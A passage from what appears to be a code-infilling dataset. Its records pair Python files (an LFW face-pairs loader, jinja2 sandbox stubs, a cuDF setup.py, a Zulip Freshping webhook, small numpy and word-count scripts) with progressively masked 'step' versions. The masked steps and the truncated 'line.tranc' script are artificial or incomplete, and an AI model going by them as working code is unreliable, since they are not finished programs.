"step-4": "import os\nimport config as cfg\nimport numpy as np\n\n\nclass lfwdata:\n\n def __init__(self):\n self._pairs = []\n pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))\n pairs.readline()\n for pair in pairs:\n pair = pair.split()\n if len(pair) == 3:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[2])))\n label = True\n elif len(pair) == 4:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[2], pair[2] + '_{:04d}.jpg'.format\n (int(pair[3])))\n label = False\n else:\n assert False, pair\n self._pairs.append({'img': [img1, img2], 'label': label})\n print('Number of pairs: {}'.format(len(self._pairs)))\n\n\nif __name__ == '__main__':\n pairs = lfwdata()\n",
"step-5": "import os\nimport config as cfg\nimport numpy as np\n\n\nclass lfwdata():\n\n def __init__(self):\n self._pairs = []\n\n pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))\n pairs.readline()\n for pair in pairs:\n pair = pair.split()\n if len(pair) == 3:\n img1 = os.path.join(\n pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[1])))\n img2 = os.path.join(\n pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[2])))\n label = True\n elif len(pair) == 4:\n img1 = os.path.join(\n pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[1])))\n img2 = os.path.join(\n pair[2], pair[2] + '_{:04d}.jpg'.format(int(pair[3])))\n label = False\n else:\n assert False, pair\n self._pairs.append({'img': [img1, img2], 'label': label})\n\n print('Number of pairs: {}'.format(len(self._pairs)))\n\nif __name__ == '__main__':\n\n pairs = lfwdata()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import numpy as np
print(np.random.binomial(10, 0.5, 1))
|
normal
|
{
"blob_id": "0a3e0eeda14e42bfff7797b3c42a0aebd9a72ade",
"index": 3212,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(np.random.binomial(10, 0.5, 1))\n",
"step-3": "import numpy as np\nprint(np.random.binomial(10, 0.5, 1))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from typing import Any
from jinja2.environment import Environment
MAX_RANGE = ... # type: int
UNSAFE_FUNCTION_ATTRIBUTES = ... # type: Any
UNSAFE_METHOD_ATTRIBUTES = ... # type: Any
UNSAFE_GENERATOR_ATTRIBUTES = ... # type: Any
def safe_range(*args): ...
def unsafe(f): ...
def is_internal_attribute(obj, attr): ...
def modifies_known_mutable(obj, attr): ...
class SandboxedEnvironment(Environment):
sandboxed = ... # type: bool
default_binop_table = ... # type: Any
default_unop_table = ... # type: Any
intercepted_binops = ... # type: Any
intercepted_unops = ... # type: Any
def intercept_unop(self, operator): ...
binop_table = ... # type: Any
unop_table = ... # type: Any
def __init__(self, *args, **kwargs) -> None: ...
def is_safe_attribute(self, obj, attr, value): ...
def is_safe_callable(self, obj): ...
def call_binop(self, context, operator, left, right): ...
def call_unop(self, context, operator, arg): ...
def getitem(self, obj, argument): ...
def getattr(self, obj, attribute): ...
def unsafe_undefined(self, obj, attribute): ...
def call(__self, __context, __obj, *args, **kwargs): ...
class ImmutableSandboxedEnvironment(SandboxedEnvironment):
def is_safe_attribute(self, obj, attr, value): ...
|
normal
|
{
"blob_id": "697f4dd640ddba0411eb6eb68e7ce079a6330670",
"index": 9837,
"step-1": "<mask token>\n\n\nclass SandboxedEnvironment(Environment):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def intercept_unop(self, operator):\n ...\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs) ->None:\n ...\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n\n def is_safe_callable(self, obj):\n ...\n <mask token>\n <mask token>\n\n def getitem(self, obj, argument):\n ...\n\n def getattr(self, obj, attribute):\n ...\n\n def unsafe_undefined(self, obj, attribute):\n ...\n <mask token>\n\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n",
"step-2": "<mask token>\n\n\nclass SandboxedEnvironment(Environment):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def intercept_unop(self, operator):\n ...\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs) ->None:\n ...\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n\n def is_safe_callable(self, obj):\n ...\n\n def call_binop(self, context, operator, left, right):\n ...\n <mask token>\n\n def getitem(self, obj, argument):\n ...\n\n def getattr(self, obj, attribute):\n ...\n\n def unsafe_undefined(self, obj, attribute):\n ...\n <mask token>\n\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n",
"step-3": "<mask token>\n\n\nclass SandboxedEnvironment(Environment):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def intercept_unop(self, operator):\n ...\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs) ->None:\n ...\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n\n def is_safe_callable(self, obj):\n ...\n\n def call_binop(self, context, operator, left, right):\n ...\n\n def call_unop(self, context, operator, arg):\n ...\n\n def getitem(self, obj, argument):\n ...\n\n def getattr(self, obj, attribute):\n ...\n\n def unsafe_undefined(self, obj, attribute):\n ...\n\n def call(__self, __context, __obj, *args, **kwargs):\n ...\n\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n",
"step-4": "<mask token>\n\n\ndef safe_range(*args):\n ...\n\n\ndef unsafe(f):\n ...\n\n\ndef is_internal_attribute(obj, attr):\n ...\n\n\n<mask token>\n\n\nclass SandboxedEnvironment(Environment):\n sandboxed = ...\n default_binop_table = ...\n default_unop_table = ...\n intercepted_binops = ...\n intercepted_unops = ...\n\n def intercept_unop(self, operator):\n ...\n binop_table = ...\n unop_table = ...\n\n def __init__(self, *args, **kwargs) ->None:\n ...\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n\n def is_safe_callable(self, obj):\n ...\n\n def call_binop(self, context, operator, left, right):\n ...\n\n def call_unop(self, context, operator, arg):\n ...\n\n def getitem(self, obj, argument):\n ...\n\n def getattr(self, obj, attribute):\n ...\n\n def unsafe_undefined(self, obj, attribute):\n ...\n\n def call(__self, __context, __obj, *args, **kwargs):\n ...\n\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n",
"step-5": "from typing import Any\nfrom jinja2.environment import Environment\n\nMAX_RANGE = ... # type: int\nUNSAFE_FUNCTION_ATTRIBUTES = ... # type: Any\nUNSAFE_METHOD_ATTRIBUTES = ... # type: Any\nUNSAFE_GENERATOR_ATTRIBUTES = ... # type: Any\n\ndef safe_range(*args): ...\ndef unsafe(f): ...\ndef is_internal_attribute(obj, attr): ...\ndef modifies_known_mutable(obj, attr): ...\n\nclass SandboxedEnvironment(Environment):\n sandboxed = ... # type: bool\n default_binop_table = ... # type: Any\n default_unop_table = ... # type: Any\n intercepted_binops = ... # type: Any\n intercepted_unops = ... # type: Any\n def intercept_unop(self, operator): ...\n binop_table = ... # type: Any\n unop_table = ... # type: Any\n def __init__(self, *args, **kwargs) -> None: ...\n def is_safe_attribute(self, obj, attr, value): ...\n def is_safe_callable(self, obj): ...\n def call_binop(self, context, operator, left, right): ...\n def call_unop(self, context, operator, arg): ...\n def getitem(self, obj, argument): ...\n def getattr(self, obj, attribute): ...\n def unsafe_undefined(self, obj, attribute): ...\n def call(__self, __context, __obj, *args, **kwargs): ...\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n def is_safe_attribute(self, obj, attr, value): ...\n",
"step-ids": [
10,
11,
13,
17,
21
]
}
|
[
10,
11,
13,
17,
21
] |
import string
fhand = open("romeo-full.txt")
counts = dict()
for line in fhand:
line.tranc
|
normal
|
{
"blob_id": "5493887e32dbe7ae27eca79d28da8488183b37a3",
"index": 8792,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in fhand:\n line.tranc\n",
"step-3": "<mask token>\nfhand = open('romeo-full.txt')\ncounts = dict()\nfor line in fhand:\n line.tranc\n",
"step-4": "import string\nfhand = open('romeo-full.txt')\ncounts = dict()\nfor line in fhand:\n line.tranc\n",
"step-5": "import string\nfhand = open(\"romeo-full.txt\")\ncounts = dict()\nfor line in fhand:\n \n line.tranc",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Copyright (c) 2018-2020, NVIDIA CORPORATION.
import os
import shutil
import subprocess
import sys
import sysconfig
from distutils.spawn import find_executable
from distutils.sysconfig import get_python_lib
import numpy as np
import pyarrow as pa
from Cython.Build import cythonize
from Cython.Distutils import build_ext
from setuptools import find_packages, setup
from setuptools.extension import Extension
import versioneer
install_requires = ["numba", "cython"]
cython_files = ["cudf/**/*.pyx"]
CUDA_HOME = os.environ.get("CUDA_HOME", False)
if not CUDA_HOME:
path_to_cuda_gdb = shutil.which("cuda-gdb")
if path_to_cuda_gdb is None:
raise OSError(
"Could not locate CUDA. "
"Please set the environment variable "
"CUDA_HOME to the path to the CUDA installation "
"and try again."
)
CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))
if not os.path.isdir(CUDA_HOME):
raise OSError(f"Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}")
cuda_include_dir = os.path.join(CUDA_HOME, "include")
CUDF_ROOT = os.environ.get("CUDF_ROOT", "../../cpp/build/")
try:
nthreads = int(os.environ.get("PARALLEL_LEVEL", "0") or "0")
except Exception:
nthreads = 0
cmdclass = versioneer.get_cmdclass()
class build_ext_and_proto(build_ext):
def run(self):
# Get protoc
protoc = None
if "PROTOC" in os.environ and os.path.exists(os.environ["PROTOC"]):
protoc = os.environ["PROTOC"]
else:
protoc = find_executable("protoc")
if protoc is None:
sys.stderr.write("protoc not found")
sys.exit(1)
# Build .proto file
for source in ["cudf/utils/metadata/orc_column_statistics.proto"]:
output = source.replace(".proto", "_pb2.py")
if not os.path.exists(output) or (
os.path.getmtime(source) > os.path.getmtime(output)
):
with open(output, "a") as src:
src.write("# flake8: noqa" + os.linesep)
src.write("# fmt: off" + os.linesep)
subprocess.check_call([protoc, "--python_out=.", source])
with open(output, "r+") as src:
new_src_content = (
"# flake8: noqa"
+ os.linesep
+ "# fmt: off"
+ os.linesep
+ src.read()
+ "# fmt: on"
+ os.linesep
)
src.seek(0)
src.write(new_src_content)
# Run original Cython build_ext command
build_ext.run(self)
cmdclass["build_ext"] = build_ext_and_proto
extensions = [
Extension(
"*",
sources=cython_files,
include_dirs=[
"../../cpp/include/cudf",
"../../cpp/include",
os.path.join(CUDF_ROOT, "include"),
os.path.join(CUDF_ROOT, "_deps/libcudacxx-src/include"),
os.path.join(
os.path.dirname(sysconfig.get_path("include")),
"libcudf/libcudacxx",
),
os.path.dirname(sysconfig.get_path("include")),
np.get_include(),
pa.get_include(),
cuda_include_dir,
],
library_dirs=(
pa.get_library_dirs()
+ [get_python_lib(), os.path.join(os.sys.prefix, "lib")]
),
libraries=["cudf"] + pa.get_libraries() + ["arrow_cuda"],
language="c++",
extra_compile_args=["-std=c++14"],
)
]
setup(
name="cudf",
version=versioneer.get_version(),
description="cuDF - GPU Dataframe",
url="https://github.com/rapidsai/cudf",
author="NVIDIA Corporation",
license="Apache 2.0",
classifiers=[
"Intended Audience :: Developers",
"Topic :: Database",
"Topic :: Scientific/Engineering",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
# Include the separately-compiled shared library
setup_requires=["cython", "protobuf"],
ext_modules=cythonize(
extensions,
nthreads=nthreads,
compiler_directives=dict(
profile=False, language_level=3, embedsignature=True
),
),
packages=find_packages(include=["cudf", "cudf.*"]),
package_data=dict.fromkeys(
find_packages(include=["cudf._lib*"]), ["*.pxd"],
),
cmdclass=cmdclass,
install_requires=install_requires,
zip_safe=False,
)
|
normal
|
{
"blob_id": "b3095f181032727544ce3ee6f1ad3a70976c0061",
"index": 7892,
"step-1": "<mask token>\n\n\nclass build_ext_and_proto(build_ext):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\nif not CUDA_HOME:\n path_to_cuda_gdb = shutil.which('cuda-gdb')\n if path_to_cuda_gdb is None:\n raise OSError(\n 'Could not locate CUDA. Please set the environment variable CUDA_HOME to the path to the CUDA installation and try again.'\n )\n CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))\nif not os.path.isdir(CUDA_HOME):\n raise OSError(f'Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}')\n<mask token>\ntry:\n nthreads = int(os.environ.get('PARALLEL_LEVEL', '0') or '0')\nexcept Exception:\n nthreads = 0\n<mask token>\n\n\nclass build_ext_and_proto(build_ext):\n\n def run(self):\n protoc = None\n if 'PROTOC' in os.environ and os.path.exists(os.environ['PROTOC']):\n protoc = os.environ['PROTOC']\n else:\n protoc = find_executable('protoc')\n if protoc is None:\n sys.stderr.write('protoc not found')\n sys.exit(1)\n for source in ['cudf/utils/metadata/orc_column_statistics.proto']:\n output = source.replace('.proto', '_pb2.py')\n if not os.path.exists(output) or os.path.getmtime(source\n ) > os.path.getmtime(output):\n with open(output, 'a') as src:\n src.write('# flake8: noqa' + os.linesep)\n src.write('# fmt: off' + os.linesep)\n subprocess.check_call([protoc, '--python_out=.', source])\n with open(output, 'r+') as src:\n new_src_content = ('# flake8: noqa' + os.linesep +\n '# fmt: off' + os.linesep + src.read() +\n '# fmt: on' + os.linesep)\n src.seek(0)\n src.write(new_src_content)\n build_ext.run(self)\n\n\n<mask token>\nsetup(name='cudf', version=versioneer.get_version(), description=\n 'cuDF - GPU Dataframe', url='https://github.com/rapidsai/cudf', author=\n 'NVIDIA Corporation', license='Apache 2.0', classifiers=[\n 'Intended Audience :: Developers', 'Topic :: Database',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7'], setup_requires=['cython',\n 'protobuf'], ext_modules=cythonize(extensions, nthreads=nthreads,\n compiler_directives=dict(profile=False, language_level=3,\n embedsignature=True)), packages=find_packages(include=['cudf', 'cudf.*'\n ]), package_data=dict.fromkeys(find_packages(include=['cudf._lib*']), [\n '*.pxd']), cmdclass=cmdclass, install_requires=install_requires,\n zip_safe=False)\n",
"step-3": "<mask token>\ninstall_requires = ['numba', 'cython']\ncython_files = ['cudf/**/*.pyx']\nCUDA_HOME = os.environ.get('CUDA_HOME', False)\nif not CUDA_HOME:\n path_to_cuda_gdb = shutil.which('cuda-gdb')\n if path_to_cuda_gdb is None:\n raise OSError(\n 'Could not locate CUDA. Please set the environment variable CUDA_HOME to the path to the CUDA installation and try again.'\n )\n CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))\nif not os.path.isdir(CUDA_HOME):\n raise OSError(f'Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}')\ncuda_include_dir = os.path.join(CUDA_HOME, 'include')\nCUDF_ROOT = os.environ.get('CUDF_ROOT', '../../cpp/build/')\ntry:\n nthreads = int(os.environ.get('PARALLEL_LEVEL', '0') or '0')\nexcept Exception:\n nthreads = 0\ncmdclass = versioneer.get_cmdclass()\n\n\nclass build_ext_and_proto(build_ext):\n\n def run(self):\n protoc = None\n if 'PROTOC' in os.environ and os.path.exists(os.environ['PROTOC']):\n protoc = os.environ['PROTOC']\n else:\n protoc = find_executable('protoc')\n if protoc is None:\n sys.stderr.write('protoc not found')\n sys.exit(1)\n for source in ['cudf/utils/metadata/orc_column_statistics.proto']:\n output = source.replace('.proto', '_pb2.py')\n if not os.path.exists(output) or os.path.getmtime(source\n ) > os.path.getmtime(output):\n with open(output, 'a') as src:\n src.write('# flake8: noqa' + os.linesep)\n src.write('# fmt: off' + os.linesep)\n subprocess.check_call([protoc, '--python_out=.', source])\n with open(output, 'r+') as src:\n new_src_content = ('# flake8: noqa' + os.linesep +\n '# fmt: off' + os.linesep + src.read() +\n '# fmt: on' + os.linesep)\n src.seek(0)\n src.write(new_src_content)\n build_ext.run(self)\n\n\ncmdclass['build_ext'] = build_ext_and_proto\nextensions = [Extension('*', sources=cython_files, include_dirs=[\n '../../cpp/include/cudf', '../../cpp/include', os.path.join(CUDF_ROOT,\n 'include'), os.path.join(CUDF_ROOT, '_deps/libcudacxx-src/include'), os\n .path.join(os.path.dirname(sysconfig.get_path('include')),\n 'libcudf/libcudacxx'), os.path.dirname(sysconfig.get_path('include')),\n np.get_include(), pa.get_include(), cuda_include_dir], library_dirs=pa.\n get_library_dirs() + [get_python_lib(), os.path.join(os.sys.prefix,\n 'lib')], libraries=['cudf'] + pa.get_libraries() + ['arrow_cuda'],\n language='c++', extra_compile_args=['-std=c++14'])]\nsetup(name='cudf', version=versioneer.get_version(), description=\n 'cuDF - GPU Dataframe', url='https://github.com/rapidsai/cudf', author=\n 'NVIDIA Corporation', license='Apache 2.0', classifiers=[\n 'Intended Audience :: Developers', 'Topic :: Database',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7'], setup_requires=['cython',\n 'protobuf'], ext_modules=cythonize(extensions, nthreads=nthreads,\n compiler_directives=dict(profile=False, language_level=3,\n embedsignature=True)), packages=find_packages(include=['cudf', 'cudf.*'\n ]), package_data=dict.fromkeys(find_packages(include=['cudf._lib*']), [\n '*.pxd']), cmdclass=cmdclass, install_requires=install_requires,\n zip_safe=False)\n",
"step-4": "import os\nimport shutil\nimport subprocess\nimport sys\nimport sysconfig\nfrom distutils.spawn import find_executable\nfrom distutils.sysconfig import get_python_lib\nimport numpy as np\nimport pyarrow as pa\nfrom Cython.Build import cythonize\nfrom Cython.Distutils import build_ext\nfrom setuptools import find_packages, setup\nfrom setuptools.extension import Extension\nimport versioneer\ninstall_requires = ['numba', 'cython']\ncython_files = ['cudf/**/*.pyx']\nCUDA_HOME = os.environ.get('CUDA_HOME', False)\nif not CUDA_HOME:\n path_to_cuda_gdb = shutil.which('cuda-gdb')\n if path_to_cuda_gdb is None:\n raise OSError(\n 'Could not locate CUDA. Please set the environment variable CUDA_HOME to the path to the CUDA installation and try again.'\n )\n CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))\nif not os.path.isdir(CUDA_HOME):\n raise OSError(f'Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}')\ncuda_include_dir = os.path.join(CUDA_HOME, 'include')\nCUDF_ROOT = os.environ.get('CUDF_ROOT', '../../cpp/build/')\ntry:\n nthreads = int(os.environ.get('PARALLEL_LEVEL', '0') or '0')\nexcept Exception:\n nthreads = 0\ncmdclass = versioneer.get_cmdclass()\n\n\nclass build_ext_and_proto(build_ext):\n\n def run(self):\n protoc = None\n if 'PROTOC' in os.environ and os.path.exists(os.environ['PROTOC']):\n protoc = os.environ['PROTOC']\n else:\n protoc = find_executable('protoc')\n if protoc is None:\n sys.stderr.write('protoc not found')\n sys.exit(1)\n for source in ['cudf/utils/metadata/orc_column_statistics.proto']:\n output = source.replace('.proto', '_pb2.py')\n if not os.path.exists(output) or os.path.getmtime(source\n ) > os.path.getmtime(output):\n with open(output, 'a') as src:\n src.write('# flake8: noqa' + os.linesep)\n src.write('# fmt: off' + os.linesep)\n subprocess.check_call([protoc, '--python_out=.', source])\n with open(output, 'r+') as src:\n new_src_content = ('# flake8: noqa' + os.linesep +\n '# fmt: off' + os.linesep + src.read() +\n '# fmt: on' + os.linesep)\n src.seek(0)\n src.write(new_src_content)\n build_ext.run(self)\n\n\ncmdclass['build_ext'] = build_ext_and_proto\nextensions = [Extension('*', sources=cython_files, include_dirs=[\n '../../cpp/include/cudf', '../../cpp/include', os.path.join(CUDF_ROOT,\n 'include'), os.path.join(CUDF_ROOT, '_deps/libcudacxx-src/include'), os\n .path.join(os.path.dirname(sysconfig.get_path('include')),\n 'libcudf/libcudacxx'), os.path.dirname(sysconfig.get_path('include')),\n np.get_include(), pa.get_include(), cuda_include_dir], library_dirs=pa.\n get_library_dirs() + [get_python_lib(), os.path.join(os.sys.prefix,\n 'lib')], libraries=['cudf'] + pa.get_libraries() + ['arrow_cuda'],\n language='c++', extra_compile_args=['-std=c++14'])]\nsetup(name='cudf', version=versioneer.get_version(), description=\n 'cuDF - GPU Dataframe', url='https://github.com/rapidsai/cudf', author=\n 'NVIDIA Corporation', license='Apache 2.0', classifiers=[\n 'Intended Audience :: Developers', 'Topic :: Database',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7'], setup_requires=['cython',\n 'protobuf'], ext_modules=cythonize(extensions, nthreads=nthreads,\n compiler_directives=dict(profile=False, language_level=3,\n embedsignature=True)), packages=find_packages(include=['cudf', 'cudf.*'\n ]), package_data=dict.fromkeys(find_packages(include=['cudf._lib*']), [\n '*.pxd']), cmdclass=cmdclass, install_requires=install_requires,\n zip_safe=False)\n",
"step-5": "# Copyright (c) 2018-2020, NVIDIA CORPORATION.\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport sysconfig\nfrom distutils.spawn import find_executable\nfrom distutils.sysconfig import get_python_lib\n\nimport numpy as np\nimport pyarrow as pa\nfrom Cython.Build import cythonize\nfrom Cython.Distutils import build_ext\nfrom setuptools import find_packages, setup\nfrom setuptools.extension import Extension\n\nimport versioneer\n\ninstall_requires = [\"numba\", \"cython\"]\n\ncython_files = [\"cudf/**/*.pyx\"]\n\nCUDA_HOME = os.environ.get(\"CUDA_HOME\", False)\nif not CUDA_HOME:\n path_to_cuda_gdb = shutil.which(\"cuda-gdb\")\n if path_to_cuda_gdb is None:\n raise OSError(\n \"Could not locate CUDA. \"\n \"Please set the environment variable \"\n \"CUDA_HOME to the path to the CUDA installation \"\n \"and try again.\"\n )\n CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))\n\nif not os.path.isdir(CUDA_HOME):\n raise OSError(f\"Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}\")\n\ncuda_include_dir = os.path.join(CUDA_HOME, \"include\")\n\nCUDF_ROOT = os.environ.get(\"CUDF_ROOT\", \"../../cpp/build/\")\n\ntry:\n nthreads = int(os.environ.get(\"PARALLEL_LEVEL\", \"0\") or \"0\")\nexcept Exception:\n nthreads = 0\n\ncmdclass = versioneer.get_cmdclass()\n\n\nclass build_ext_and_proto(build_ext):\n def run(self):\n # Get protoc\n protoc = None\n if \"PROTOC\" in os.environ and os.path.exists(os.environ[\"PROTOC\"]):\n protoc = os.environ[\"PROTOC\"]\n else:\n protoc = find_executable(\"protoc\")\n if protoc is None:\n sys.stderr.write(\"protoc not found\")\n sys.exit(1)\n\n # Build .proto file\n for source in [\"cudf/utils/metadata/orc_column_statistics.proto\"]:\n output = source.replace(\".proto\", \"_pb2.py\")\n\n if not os.path.exists(output) or (\n os.path.getmtime(source) > os.path.getmtime(output)\n ):\n with open(output, \"a\") as src:\n src.write(\"# flake8: noqa\" + os.linesep)\n src.write(\"# fmt: off\" + os.linesep)\n subprocess.check_call([protoc, \"--python_out=.\", source])\n with open(output, \"r+\") as src:\n new_src_content = (\n \"# flake8: noqa\"\n + os.linesep\n + \"# fmt: off\"\n + os.linesep\n + src.read()\n + \"# fmt: on\"\n + os.linesep\n )\n src.seek(0)\n src.write(new_src_content)\n\n # Run original Cython build_ext command\n build_ext.run(self)\n\n\ncmdclass[\"build_ext\"] = build_ext_and_proto\n\nextensions = [\n Extension(\n \"*\",\n sources=cython_files,\n include_dirs=[\n \"../../cpp/include/cudf\",\n \"../../cpp/include\",\n os.path.join(CUDF_ROOT, \"include\"),\n os.path.join(CUDF_ROOT, \"_deps/libcudacxx-src/include\"),\n os.path.join(\n os.path.dirname(sysconfig.get_path(\"include\")),\n \"libcudf/libcudacxx\",\n ),\n os.path.dirname(sysconfig.get_path(\"include\")),\n np.get_include(),\n pa.get_include(),\n cuda_include_dir,\n ],\n library_dirs=(\n pa.get_library_dirs()\n + [get_python_lib(), os.path.join(os.sys.prefix, \"lib\")]\n ),\n libraries=[\"cudf\"] + pa.get_libraries() + [\"arrow_cuda\"],\n language=\"c++\",\n extra_compile_args=[\"-std=c++14\"],\n )\n]\n\nsetup(\n name=\"cudf\",\n version=versioneer.get_version(),\n description=\"cuDF - GPU Dataframe\",\n url=\"https://github.com/rapidsai/cudf\",\n author=\"NVIDIA Corporation\",\n license=\"Apache 2.0\",\n classifiers=[\n \"Intended Audience :: Developers\",\n \"Topic :: Database\",\n \"Topic :: Scientific/Engineering\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n # Include the separately-compiled shared library\n setup_requires=[\"cython\", \"protobuf\"],\n ext_modules=cythonize(\n extensions,\n nthreads=nthreads,\n compiler_directives=dict(\n profile=False, language_level=3, embedsignature=True\n ),\n ),\n packages=find_packages(include=[\"cudf\", \"cudf.*\"]),\n package_data=dict.fromkeys(\n find_packages(include=[\"cudf._lib*\"]), [\"*.pxd\"],\n ),\n cmdclass=cmdclass,\n install_requires=install_requires,\n zip_safe=False,\n)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from typing import Any, Dict
from django.http import HttpRequest, HttpResponse
from zerver.decorator import REQ, has_request_variables, webhook_view
from zerver.lib.response import json_success
from zerver.lib.webhooks.common import check_send_webhook_message, get_setup_webhook_message
from zerver.models import UserProfile
FRESHPING_TOPIC_TEMPLATE_TEST = "Freshping"
FRESHPING_TOPIC_TEMPLATE = "{check_name}"
FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE = """
{request_url} has just become unreachable.
Error code: {http_status_code}.
""".strip()
FRESHPING_MESSAGE_TEMPLATE_UP = "{request_url} is back up and no longer unreachable."
@webhook_view("Freshping")
@has_request_variables
def api_freshping_webhook(
request: HttpRequest,
user_profile: UserProfile,
payload: Dict[str, Any] = REQ(argument_type="body"),
) -> HttpResponse:
body = get_body_for_http_request(payload)
subject = get_subject_for_http_request(payload)
check_send_webhook_message(request, user_profile, subject, body)
return json_success()
def get_subject_for_http_request(payload: Dict[str, Any]) -> str:
webhook_event_data = payload["webhook_event_data"]
if webhook_event_data["application_name"] == "Webhook test":
subject = FRESHPING_TOPIC_TEMPLATE_TEST
else:
subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=webhook_event_data["check_name"])
return subject
def get_body_for_http_request(payload: Dict[str, Any]) -> str:
webhook_event_data = payload["webhook_event_data"]
if webhook_event_data["check_state_name"] == "Reporting Error":
body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**webhook_event_data)
elif webhook_event_data["check_state_name"] == "Available":
if webhook_event_data["application_name"] == "Webhook test":
body = get_setup_webhook_message("Freshping")
else:
body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)
return body
|
normal
|
{
"blob_id": "f60d02fb14364fb631d87fcf535b2cb5782e728f",
"index": 6539,
"step-1": "<mask token>\n\n\n@webhook_view('Freshping')\n@has_request_variables\ndef api_freshping_webhook(request: HttpRequest, user_profile: UserProfile,\n payload: Dict[str, Any]=REQ(argument_type='body')) ->HttpResponse:\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@webhook_view('Freshping')\n@has_request_variables\ndef api_freshping_webhook(request: HttpRequest, user_profile: UserProfile,\n payload: Dict[str, Any]=REQ(argument_type='body')) ->HttpResponse:\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\ndef get_subject_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['application_name'] == 'Webhook test':\n subject = FRESHPING_TOPIC_TEMPLATE_TEST\n else:\n subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=\n webhook_event_data['check_name'])\n return subject\n\n\ndef get_body_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['check_state_name'] == 'Reporting Error':\n body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**\n webhook_event_data)\n elif webhook_event_data['check_state_name'] == 'Available':\n if webhook_event_data['application_name'] == 'Webhook test':\n body = get_setup_webhook_message('Freshping')\n else:\n body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)\n return body\n",
